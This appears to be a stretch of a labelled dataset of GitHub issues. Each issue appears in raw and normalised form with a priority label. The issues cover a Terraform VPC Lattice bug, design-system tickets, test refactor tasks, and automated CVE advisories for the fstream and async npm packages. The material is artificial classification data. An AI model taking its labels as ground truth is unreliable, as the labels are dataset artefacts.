### Terraform Core Version 1.4.6 ### AWS Provider Version 4.67.0 ### Affected Resource(s) * aws_vpclattice_service_network_vpc_association ### Expected Behavior `aws_vpclattice_service_network_vpc_association` should not replace resources when passing an ARN for the `service_network_identifier`. According to the [resource documentation](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/vpclattice_service_network_vpc_association) passing an ARN is mandatory when using a different AWS account, thus this should never cause a problem. ### Actual Behavior Terraform will replace the `aws_vpclattice_service_network_vpc_association` every single time, due to the desired value (ARN) mismatching the stored value, despite them referring to the same service network. Example with all sensitive values removed: ``` # aws_vpclattice_service_network_vpc_association.this must be replaced -/+ resource "aws_vpclattice_service_network_vpc_association" "this" { ~ arn = "arn:aws:vpc-lattice:{REGION}:{ACCOUNT_ID}:servicenetworkvpcassociation/{ASSOCIATION_ID}" -> (known after apply) ~ created_by = "{ACCOUNT_ID}" -> (known after apply) ~ id = "{ASSOCIATION_ID}" -> (known after apply) ~ service_network_identifier = "{SERVICE_NETWORK_ID}" -> "arn:aws:vpc-lattice:{REGION}:{ACCOUNT_ID}:servicenetwork/{SERVICE_NETWORK_ID}" # forces replacement ~ status = "ACTIVE" -> (known after apply) # (3 unchanged attributes hidden) } ``` ### Relevant Error/Panic Output Snippet _No response_ ### Terraform Configuration Files I have not tested this example, but this should suffice to replicate the issue: ```hcl resource "aws_vpc" "this" { cidr_block = "10.42.0.0/16" } resource "aws_vpclattice_service_network" "this" { name = "some_service_network" auth_type = "AWS_IAM" } resource "aws_vpclattice_service_network_vpc_association" "this" { vpc_identifier = aws_vpc.this.id service_network_identifier = aws_vpclattice_service_network.this.arn } ``` ### Steps to Reproduce * Create an `aws_vpclattice_service_network_vpc_association` that refers to a service network by ARN * `terraform apply` * `terraform plan` ### Debug Output _No response_ ### Panic Output _No response_ ### Important Factoids _No response_ ### References _No response_ ### Would you like to implement a fix? None
1.0
[Bug]: Forced replacement of `aws_vpclattice_service_network_vpc_association` when using ARN as `service_network_identifier` - ### Terraform Core Version 1.4.6 ### AWS Provider Version 4.67.0 ### Affected Resource(s) * aws_vpclattice_service_network_vpc_association ### Expected Behavior `aws_vpclattice_service_network_vpc_association` should not replace resources when passing an ARN for the `service_network_identifier`. According to the [resource documentation](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/vpclattice_service_network_vpc_association) passing an ARN is mandatory when using a different AWS account, thus this should never cause a problem. ### Actual Behavior Terraform will replace the `aws_vpclattice_service_network_vpc_association` every single time, due to the desired value (ARN) mismatching the stored value, despite them referring to the same service network. Example with all sensitive values removed: ``` # aws_vpclattice_service_network_vpc_association.this must be replaced -/+ resource "aws_vpclattice_service_network_vpc_association" "this" { ~ arn = "arn:aws:vpc-lattice:{REGION}:{ACCOUNT_ID}:servicenetworkvpcassociation/{ASSOCIATION_ID}" -> (known after apply) ~ created_by = "{ACCOUNT_ID}" -> (known after apply) ~ id = "{ASSOCIATION_ID}" -> (known after apply) ~ service_network_identifier = "{SERVICE_NETWORK_ID}" -> "arn:aws:vpc-lattice:{REGION}:{ACCOUNT_ID}:servicenetwork/{SERVICE_NETWORK_ID}" # forces replacement ~ status = "ACTIVE" -> (known after apply) # (3 unchanged attributes hidden) } ``` ### Relevant Error/Panic Output Snippet _No response_ ### Terraform Configuration Files I have not tested this example, but this should suffice to replicate the issue: ```hcl resource "aws_vpc" "this" { cidr_block = "10.42.0.0/16" } resource "aws_vpclattice_service_network" "this" { name = "some_service_network" auth_type = "AWS_IAM" } resource "aws_vpclattice_service_network_vpc_association" "this" { vpc_identifier = aws_vpc.this.id service_network_identifier = aws_vpclattice_service_network.this.arn } ``` ### Steps to Reproduce * Create an `aws_vpclattice_service_network_vpc_association` that refers to a service network by ARN * `terraform apply` * `terraform plan` ### Debug Output _No response_ ### Panic Output _No response_ ### Important Factoids _No response_ ### References _No response_ ### Would you like to implement a fix? None
non_priority
forced replacement of aws vpclattice service network vpc association when using arn as service network identifier terraform core version aws provider version affected resource s aws vpclattice service network vpc association expected behavior aws vpclattice service network vpc association should not replace resources when passing an arn for the service network identifier according to the passing an arn is mandatory when using a different aws account thus this should never cause a problem actual behavior terraform will replace the aws vpclattice service network vpc association every single time due to the desired value arn mismatching the stored value despite them referring to the same service network example with all sensitive values removed aws vpclattice service network vpc association this must be replaced resource aws vpclattice service network vpc association this arn arn aws vpc lattice region account id servicenetworkvpcassociation association id known after apply created by account id known after apply id association id known after apply service network identifier service network id arn aws vpc lattice region account id servicenetwork service network id forces replacement status active known after apply unchanged attributes hidden relevant error panic output snippet no response terraform configuration files i have not tested this example but this should suffice to replicate the issue hcl resource aws vpc this cidr block resource aws vpclattice service network this name some service network auth type aws iam resource aws vpclattice service network vpc association this vpc identifier aws vpc this id service network identifier aws vpclattice service network this arn steps to reproduce create an aws vpclattice service network vpc association that refers to a service network by arn terraform apply terraform plan debug output no response panic output no response important factoids no response references no response would you like to implement a fix none
0
133,295
28,967,179,637
IssuesEvent
2023-05-10 08:43:16
porsche-design-system/porsche-design-system
https://api.github.com/repos/porsche-design-system/porsche-design-system
closed
Create Component / Model Link Tile
component code 👨🏻‍💻 design 🎨
Scope --- To support a consistent appearance for specific link tiles that are used for model series we want to provide a model tile component, e.g. used in finder home and check in Specs --- - Name `model-tile` | `model-link-tile` | `link-tile-model` | `…` - Only link variant (no button variant needed) - No compact - No align prop - ~Aspect ratio only 4:3, 3:4, 9:16~ Same as Link tile - define 2 links: primary (complete tile + primary link) and secondary (secondary link) - model-signature top left Out of Scope --- - No image handling Notes --- - Figma: https://www.figma.com/file/EkdP468u4ZVuIRwalKCscb/Design-System-v3?node-id=8140%3A57961&t=J2fZ155wV15Dzg1a-0 - Don't use `link tile` internally - ~Ensure JS framework routing is working without slotted anchor~ (works at the moment like link tile, framework routing is outscoped in seperate ticket) Acceptance criteria --- - [x] Model Link Tile component is available and documented Subtasks --- - [x] Create Component - [x] share styles with link tile - [x] validate slots - [x] refactor weight semiBold to semi-bold - [x] create alias for types with component prefix - [x] find a generic way to set requird props in unit test and e2e - [x] check for custom slotted styles in initalStyles partial (picture > img) - [x] clean index.html - [x] clean assets - [x] add prop validation - [x] Add unit tests - [x] check chunk size of link tile - [x] think about signature size, should it change? If how? - [x] Add e2e tests - [x] add focus behavior test - [x] add lifecycle tests - [x] add vrt tests, component + overview - [x] add scaling / high contrast vrt test - [x] add storefront docu - [x] ssr check - [x] think about directions naming - [x] Talk about JSSDirections naming - [x] cross browser check - [x] uxpin check - [x] changelog entry - [x] check hover state vrt - [x] check where the picture is - [x] 320px width not correct - [x] unit test direction jss - [x] unit test link button tile styles - [x] change default aspect ratio to 3:4 - [x] remove top gradient - [x] support `p-link` with slotted a - [x] solve framework routing - [x] uxpin check Questions --- - ~No slotted anchor support?~ - what about size? -> predefined size, no prop - what about weight? -> semibold + regular - what about "sub-description"? -> size + weight not customizable - ~how to pass label + href for primary / secondary links?~ -> p-link in slot - ~link group grid, mediaquery or width of element?~ - whats our default weight? -> sync to link-tile
1.0
Create Component / Model Link Tile - Scope --- To support a consistent appearance for specific link tiles that are used for model series we want to provide a model tile component, e.g. used in finder home and check in Specs --- - Name `model-tile` | `model-link-tile` | `link-tile-model` | `…` - Only link variant (no button variant needed) - No compact - No align prop - ~Aspect ratio only 4:3, 3:4, 9:16~ Same as Link tile - define 2 links: primary (complete tile + primary link) and secondary (secondary link) - model-signature top left Out of Scope --- - No image handling Notes --- - Figma: https://www.figma.com/file/EkdP468u4ZVuIRwalKCscb/Design-System-v3?node-id=8140%3A57961&t=J2fZ155wV15Dzg1a-0 - Don't use `link tile` internally - ~Ensure JS framework routing is working without slotted anchor~ (works at the moment like link tile, framework routing is outscoped in seperate ticket) Acceptance criteria --- - [x] Model Link Tile component is available and documented Subtasks --- - [x] Create Component - [x] share styles with link tile - [x] validate slots - [x] refactor weight semiBold to semi-bold - [x] create alias for types with component prefix - [x] find a generic way to set requird props in unit test and e2e - [x] check for custom slotted styles in initalStyles partial (picture > img) - [x] clean index.html - [x] clean assets - [x] add prop validation - [x] Add unit tests - [x] check chunk size of link tile - [x] think about signature size, should it change? If how? - [x] Add e2e tests - [x] add focus behavior test - [x] add lifecycle tests - [x] add vrt tests, component + overview - [x] add scaling / high contrast vrt test - [x] add storefront docu - [x] ssr check - [x] think about directions naming - [x] Talk about JSSDirections naming - [x] cross browser check - [x] uxpin check - [x] changelog entry - [x] check hover state vrt - [x] check where the picture is - [x] 320px width not correct - [x] unit test direction jss - [x] unit test link button tile styles - [x] change default aspect ratio to 3:4 - [x] remove top gradient - [x] support `p-link` with slotted a - [x] solve framework routing - [x] uxpin check Questions --- - ~No slotted anchor support?~ - what about size? -> predefined size, no prop - what about weight? -> semibold + regular - what about "sub-description"? -> size + weight not customizable - ~how to pass label + href for primary / secondary links?~ -> p-link in slot - ~link group grid, mediaquery or width of element?~ - whats our default weight? -> sync to link-tile
non_priority
create component model link tile scope to support a consistent appearance for specific link tiles that are used for model series we want to provide a model tile component e g used in finder home and check in specs name model tile model link tile link tile model … only link variant no button variant needed no compact no align prop aspect ratio only same as link tile define links primary complete tile primary link and secondary secondary link model signature top left out of scope no image handling notes figma don t use link tile internally ensure js framework routing is working without slotted anchor works at the moment like link tile framework routing is outscoped in seperate ticket acceptance criteria model link tile component is available and documented subtasks create component share styles with link tile validate slots refactor weight semibold to semi bold create alias for types with component prefix find a generic way to set requird props in unit test and check for custom slotted styles in initalstyles partial picture img clean index html clean assets add prop validation add unit tests check chunk size of link tile think about signature size should it change if how add tests add focus behavior test add lifecycle tests add vrt tests component overview add scaling high contrast vrt test add storefront docu ssr check think about directions naming talk about jssdirections naming cross browser check uxpin check changelog entry check hover state vrt check where the picture is width not correct unit test direction jss unit test link button tile styles change default aspect ratio to remove top gradient support p link with slotted a solve framework routing uxpin check questions no slotted anchor support what about size predefined size no prop what about weight semibold regular what about sub description size weight not customizable how to pass label href for primary secondary links p link in slot link group grid mediaquery or width of element whats our default weight sync to link tile
0
18,892
10,299,659,877
IssuesEvent
2019-08-28 11:05:35
DashboardHub/Website
https://api.github.com/repos/DashboardHub/Website
closed
CVE-2019-13173 (High) detected in fstream-1.0.11.tgz
security vulnerability
## CVE-2019-13173 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>fstream-1.0.11.tgz</b></p></summary> <p>Advanced file system stream things</p> <p>Library home page: <a href="https://registry.npmjs.org/fstream/-/fstream-1.0.11.tgz">https://registry.npmjs.org/fstream/-/fstream-1.0.11.tgz</a></p> <p>Path to dependency file: /Website/package.json</p> <p>Path to vulnerable library: /tmp/git/Website/node_modules/fstream/package.json</p> <p> Dependency Hierarchy: - gulp-sass-4.0.1.tgz (Root Library) - node-sass-4.8.3.tgz - node-gyp-3.6.2.tgz - :x: **fstream-1.0.11.tgz** (Vulnerable Library) <p>Found in HEAD commit: <a href="https://github.com/DashboardHub/Website/commit/f84d2e3213da75d9b39d8e34f65356284277505e">f84d2e3213da75d9b39d8e34f65356284277505e</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> fstream before 1.0.12 is vulnerable to Arbitrary File Overwrite. Extracting tarballs containing a hardlink to a file that already exists in the system, and a file that matches the hardlink, will overwrite the system's file with the contents of the extracted file. The fstream.DirWriter() function is vulnerable. <p>Publish Date: 2019-07-02 <p>URL: <a href=https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13173>CVE-2019-13173</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: High - Availability Impact: None </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13173">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13173</a></p> <p>Release Date: 2019-07-02</p> <p>Fix Resolution: 1.0.12</p> </p> </details> <p></p> *** Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
True
CVE-2019-13173 (High) detected in fstream-1.0.11.tgz - ## CVE-2019-13173 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>fstream-1.0.11.tgz</b></p></summary> <p>Advanced file system stream things</p> <p>Library home page: <a href="https://registry.npmjs.org/fstream/-/fstream-1.0.11.tgz">https://registry.npmjs.org/fstream/-/fstream-1.0.11.tgz</a></p> <p>Path to dependency file: /Website/package.json</p> <p>Path to vulnerable library: /tmp/git/Website/node_modules/fstream/package.json</p> <p> Dependency Hierarchy: - gulp-sass-4.0.1.tgz (Root Library) - node-sass-4.8.3.tgz - node-gyp-3.6.2.tgz - :x: **fstream-1.0.11.tgz** (Vulnerable Library) <p>Found in HEAD commit: <a href="https://github.com/DashboardHub/Website/commit/f84d2e3213da75d9b39d8e34f65356284277505e">f84d2e3213da75d9b39d8e34f65356284277505e</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> fstream before 1.0.12 is vulnerable to Arbitrary File Overwrite. Extracting tarballs containing a hardlink to a file that already exists in the system, and a file that matches the hardlink, will overwrite the system's file with the contents of the extracted file. The fstream.DirWriter() function is vulnerable. <p>Publish Date: 2019-07-02 <p>URL: <a href=https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13173>CVE-2019-13173</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: High - Availability Impact: None </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13173">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13173</a></p> <p>Release Date: 2019-07-02</p> <p>Fix Resolution: 1.0.12</p> </p> </details> <p></p> *** Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
non_priority
cve high detected in fstream tgz cve high severity vulnerability vulnerable library fstream tgz advanced file system stream things library home page a href path to dependency file website package json path to vulnerable library tmp git website node modules fstream package json dependency hierarchy gulp sass tgz root library node sass tgz node gyp tgz x fstream tgz vulnerable library found in head commit a href vulnerability details fstream before is vulnerable to arbitrary file overwrite extracting tarballs containing a hardlink to a file that already exists in the system and a file that matches the hardlink will overwrite the system s file with the contents of the extracted file the fstream dirwriter function is vulnerable publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction none scope unchanged impact metrics confidentiality impact none integrity impact high availability impact none for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution step up your open source security game with whitesource
0
180,907
21,625,852,528
IssuesEvent
2022-05-05 01:58:29
AlexRogalskiy/java-patterns
https://api.github.com/repos/AlexRogalskiy/java-patterns
opened
CVE-2021-43138 (High) detected in async-1.5.2.tgz, async-0.2.10.tgz
security vulnerability
## CVE-2021-43138 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>async-1.5.2.tgz</b>, <b>async-0.2.10.tgz</b></p></summary> <p> <details><summary><b>async-1.5.2.tgz</b></p></summary> <p>Higher-order functions and common patterns for asynchronous code</p> <p>Library home page: <a href="https://registry.npmjs.org/async/-/async-1.5.2.tgz">https://registry.npmjs.org/async/-/async-1.5.2.tgz</a></p> <p>Path to dependency file: /package.json</p> <p>Path to vulnerable library: /node_modules/portscanner/node_modules/async/package.json,/node_modules/npmi/node_modules/npm/node_modules/request/node_modules/form-data/node_modules/async/package.json</p> <p> Dependency Hierarchy: - gitbook-cli-2.3.2.tgz (Root Library) - npmi-1.0.1.tgz - npm-2.15.12.tgz - request-2.74.0.tgz - form-data-1.0.0-rc4.tgz - :x: **async-1.5.2.tgz** (Vulnerable Library) </details> <details><summary><b>async-0.2.10.tgz</b></p></summary> <p>Higher-order functions and common patterns for asynchronous code</p> <p>Library home page: <a href="https://registry.npmjs.org/async/-/async-0.2.10.tgz">https://registry.npmjs.org/async/-/async-0.2.10.tgz</a></p> <p>Path to dependency file: /package.json</p> <p>Path to vulnerable library: /node_modules/prompt/node_modules/async/package.json,/node_modules/utile/node_modules/async/package.json</p> <p> Dependency Hierarchy: - jscs-3.0.7.tgz (Root Library) - prompt-0.2.14.tgz - utile-0.2.1.tgz - :x: **async-0.2.10.tgz** (Vulnerable Library) </details> <p>Found in base branch: <b>master</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> In Async before 2.6.4 and 3.x before 3.2.2, a malicious user can obtain privileges via the mapValues() method, aka lib/internal/iterator.js createObjectIterator prototype pollution. <p>Publish Date: 2022-04-06 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-43138>CVE-2021-43138</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.8</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Local - Attack Complexity: Low - Privileges Required: None - User Interaction: Required - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: High - Integrity Impact: High - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-43138">https://nvd.nist.gov/vuln/detail/CVE-2021-43138</a></p> <p>Release Date: 2022-04-06</p> <p>Fix Resolution: async - v3.2.2</p> </p> </details> <p></p> *** Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
True
CVE-2021-43138 (High) detected in async-1.5.2.tgz, async-0.2.10.tgz - ## CVE-2021-43138 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>async-1.5.2.tgz</b>, <b>async-0.2.10.tgz</b></p></summary> <p> <details><summary><b>async-1.5.2.tgz</b></p></summary> <p>Higher-order functions and common patterns for asynchronous code</p> <p>Library home page: <a href="https://registry.npmjs.org/async/-/async-1.5.2.tgz">https://registry.npmjs.org/async/-/async-1.5.2.tgz</a></p> <p>Path to dependency file: /package.json</p> <p>Path to vulnerable library: /node_modules/portscanner/node_modules/async/package.json,/node_modules/npmi/node_modules/npm/node_modules/request/node_modules/form-data/node_modules/async/package.json</p> <p> Dependency Hierarchy: - gitbook-cli-2.3.2.tgz (Root Library) - npmi-1.0.1.tgz - npm-2.15.12.tgz - request-2.74.0.tgz - form-data-1.0.0-rc4.tgz - :x: **async-1.5.2.tgz** (Vulnerable Library) </details> <details><summary><b>async-0.2.10.tgz</b></p></summary> <p>Higher-order functions and common patterns for asynchronous code</p> <p>Library home page: <a href="https://registry.npmjs.org/async/-/async-0.2.10.tgz">https://registry.npmjs.org/async/-/async-0.2.10.tgz</a></p> <p>Path to dependency file: /package.json</p> <p>Path to vulnerable library: /node_modules/prompt/node_modules/async/package.json,/node_modules/utile/node_modules/async/package.json</p> <p> Dependency Hierarchy: - jscs-3.0.7.tgz (Root Library) - prompt-0.2.14.tgz - utile-0.2.1.tgz - :x: **async-0.2.10.tgz** (Vulnerable Library) </details> <p>Found in base branch: <b>master</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> In Async before 2.6.4 and 3.x before 3.2.2, a malicious user can obtain privileges via the mapValues() method, aka lib/internal/iterator.js createObjectIterator prototype pollution. <p>Publish Date: 2022-04-06 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-43138>CVE-2021-43138</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.8</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Local - Attack Complexity: Low - Privileges Required: None - User Interaction: Required - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: High - Integrity Impact: High - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-43138">https://nvd.nist.gov/vuln/detail/CVE-2021-43138</a></p> <p>Release Date: 2022-04-06</p> <p>Fix Resolution: async - v3.2.2</p> </p> </details> <p></p> *** Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
non_priority
cve high detected in async tgz async tgz cve high severity vulnerability vulnerable libraries async tgz async tgz async tgz higher order functions and common patterns for asynchronous code library home page a href path to dependency file package json path to vulnerable library node modules portscanner node modules async package json node modules npmi node modules npm node modules request node modules form data node modules async package json dependency hierarchy gitbook cli tgz root library npmi tgz npm tgz request tgz form data tgz x async tgz vulnerable library async tgz higher order functions and common patterns for asynchronous code library home page a href path to dependency file package json path to vulnerable library node modules prompt node modules async package json node modules utile node modules async package json dependency hierarchy jscs tgz root library prompt tgz utile tgz x async tgz vulnerable library found in base branch master vulnerability details in async before and x before a malicious user can obtain privileges via the mapvalues method aka lib internal iterator js createobjectiterator prototype pollution publish date url a href cvss score details base score metrics exploitability metrics attack vector local attack complexity low privileges required none user interaction required scope unchanged impact metrics confidentiality impact high integrity impact high availability impact high for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution async step up your open source security game with whitesource
0
418,848
28,129,682,891
IssuesEvent
2023-03-31 21:15:59
DavidDeSimone/OpenCloudSaves
https://api.github.com/repos/DavidDeSimone/OpenCloudSaves
opened
Contributors Guide
documentation
I need to write more documentation about how the code works and about how to contribute.
1.0
Contributors Guide - I need to write more documentation about how the code works and about how to contribute.
non_priority
contributors guide i need to write more documentation about how the code works and about how to contribute
0
131,300
10,687,346,969
IssuesEvent
2019-10-22 15:57:33
OpenTechFund/opentech.fund
https://api.github.com/repos/OpenTechFund/opentech.fund
closed
PAF page: custom fields
Sprint 2 🏃 Sprint 3 🏃 needs tests
@todd-dembrey to update with spec information Description & SOW Justification Special Conditions - [ ] Admins can create a form associated with a fund in the Wagtail admin - [ ] PAF renders fields only for staff - [ ] Project PAF is immune to changes to the base PAF definition
1.0
PAF page: custom fields - @todd-dembrey to update with spec information Description & SOW Justification Special Conditions - [ ] Admins can create a form associated with a fund in the Wagtail admin - [ ] PAF renders fields only for staff - [ ] Project PAF is immune to changes to the base PAF definition
non_priority
paf page custom fields todd dembrey to update with spec information description sow justification special conditions admins can create a form associated with a fund in the wagtail admin paf renders fields only for staff project paf is immune to changes to the base paf definition
0
15,730
9,604,787,758
IssuesEvent
2019-05-10 21:07:21
kubernetes-sigs/kubespray
https://api.github.com/repos/kubernetes-sigs/kubespray
closed
Security considerations
feature help wanted lifecycle/rotten security
For those running Kubernetes in an enterprise environment, CIS benchmarks for Kubernetes and Docker are a deal breaker. Are there any future plans on incorporating the CIS benchmark checklist into the mix?
True
Security considerations - For those running Kubernetes in an enterprise environment, CIS benchmarks for Kubernetes and Docker are a deal breaker. Are there any future plans on incorporating the CIS benchmark checklist into the mix?
non_priority
security considerations for those running kubernetes in an enterprise environment cis benchmarks for kubernetes and docker are a deal breaker are there any future plans on incorporating the cis benchmark checklist into the mix
0
128,196
17,461,561,346
IssuesEvent
2021-08-06 11:14:15
alphagov/govuk_publishing_components
https://api.github.com/repos/alphagov/govuk_publishing_components
closed
Govspeak buttons states
accessibility design
While reviewing [this PR](https://github.com/alphagov/govuk_publishing_components/pull/2099/), noticed that the button within `govspeak` do not have relevant `hover`, states ![Jun-01-2021 14-37-28](https://user-images.githubusercontent.com/71266765/120332745-f09cb300-c2e6-11eb-9640-1e28bf547a7d.gif)
1.0
Govspeak buttons states - While reviewing [this PR](https://github.com/alphagov/govuk_publishing_components/pull/2099/), noticed that the button within `govspeak` do not have relevant `hover`, states ![Jun-01-2021 14-37-28](https://user-images.githubusercontent.com/71266765/120332745-f09cb300-c2e6-11eb-9640-1e28bf547a7d.gif)
non_priority
govspeak buttons states while reviewing noticed that the button within govspeak do not have relevant hover states
0
245,830
20,797,786,476
IssuesEvent
2022-03-17 10:58:54
wazuh/wazuh-qa
https://api.github.com/repos/wazuh/wazuh-qa
closed
Vulnerability detector test module refactor: `test_debian_inventory_debian_feed`
team/qa type/rework test/integration feature/vuln-detector subteam/qa-thunder
It is asked to refactor the test module named `test_debian_inventory_debian_feed.py`. It is disabled for now, as it was failing or unstable, causing false positives. ## Tasks - [ ] Make a study of the objectives of the test, and what is being tested. - [ ] Refactor the test. Clean and modularizable code. - [ ] Check that the test always starts from the same state and restores it completely at the end of the test (independent of the tests previously executed in that environment). - [ ] Review test documentation, and modify if necessary. - [ ] Proven that tests **pass** when they have to pass. - [ ] Proven that tests **fail** when they have to fail. - [ ] Test in 5-10 rounds of execution that the test always shows the same result. - [ ] Run all Vulnerability detector integration tests and check the "full green". ## Checks - [ ] The code complies with the standard PEP-8 format. - [ ] Python codebase is documented following the Google Style for Python docstrings. - [ ] The test is processed by `qa-docs` tool without errors.
1.0
Vulnerability detector test module refactor: `test_debian_inventory_debian_feed` - It is asked to refactor the test module named `test_debian_inventory_debian_feed.py`. It is disabled for now, as it was failing or unstable, causing false positives. ## Tasks - [ ] Make a study of the objectives of the test, and what is being tested. - [ ] Refactor the test. Clean and modularizable code. - [ ] Check that the test always starts from the same state and restores it completely at the end of the test (independent of the tests previously executed in that environment). - [ ] Review test documentation, and modify if necessary. - [ ] Proven that tests **pass** when they have to pass. - [ ] Proven that tests **fail** when they have to fail. - [ ] Test in 5-10 rounds of execution that the test always shows the same result. - [ ] Run all Vulnerability detector integration tests and check the "full green". ## Checks - [ ] The code complies with the standard PEP-8 format. - [ ] Python codebase is documented following the Google Style for Python docstrings. - [ ] The test is processed by `qa-docs` tool without errors.
non_priority
vulnerability detector test module refactor test debian inventory debian feed it is asked to refactor the test module named test debian inventory debian feed py it is disabled for now as it was failing or unstable causing false positives tasks make a study of the objectives of the test and what is being tested refactor the test clean and modularizable code check that the test always starts from the same state and restores it completely at the end of the test independent of the tests previously executed in that environment review test documentation and modify if necessary proven that tests pass when they have to pass proven that tests fail when they have to fail test in rounds of execution that the test always shows the same result run all vulnerability detector integration tests and check the full green checks the code complies with the standard pep format python codebase is documented following the google style for python docstrings the test is processed by qa docs tool without errors
0
356,596
25,176,220,505
IssuesEvent
2022-11-11 09:29:42
kelvinou01/pe
https://api.github.com/repos/kelvinou01/pe
opened
[DG] missing extension in UC1
type.DocumentationBug severity.Medium
Missing the extension: "If the user is viewing expenses/income for a certain month x, then the user may not see their new entry if it does not belong in x" <!--session: 1668143770497-86d1106c-e66d-4781-bf4d-5f3b9a0b5a08--> <!--Version: Web v3.4.4-->
1.0
[DG] missing extension in UC1 - Missing the extension: "If the user is viewing expenses/income for a certain month x, then the user may not see their new entry if it does not belong in x" <!--session: 1668143770497-86d1106c-e66d-4781-bf4d-5f3b9a0b5a08--> <!--Version: Web v3.4.4-->
non_priority
missing extension in missing the extension if the user is viewing expenses income for a certain month x then the user may not see their new entry if it does not belong in x
0
47,155
13,056,042,982
IssuesEvent
2020-07-30 03:28:54
icecube-trac/tix2
https://api.github.com/repos/icecube-trac/tix2
closed
glshovel creates zero-size captures (Trac #71)
Migrated from Trac defect glshovel
```text I'm getting snapshot.jpg Couldn?t open the file. It may be corrupt or a file format that Preview doesn?t recognize. when I try to open in either Preview or PowerPoint. Intel Mac with GLShovel-20070511-x86.dmg. ``` Migrated from https://code.icecube.wisc.edu/ticket/71 ```json { "status": "closed", "changetime": "2007-11-11T03:37:42", "description": "{{{\nI'm getting\n\nsnapshot.jpg\n\nCouldn?t open the file. It may be corrupt or a file format that Preview\ndoesn?t recognize.\n\nwhen I try to open in either Preview or PowerPoint. Intel Mac with\nGLShovel-20070511-x86.dmg.\n\n\n}}}", "reporter": "troy", "cc": "", "resolution": "duplicate", "_ts": "1194752262000000", "component": "glshovel", "summary": "glshovel creates zero-size captures", "priority": "normal", "keywords": "", "time": "2007-06-21T13:14:46", "milestone": "", "owner": "troy", "type": "defect" } ```
1.0
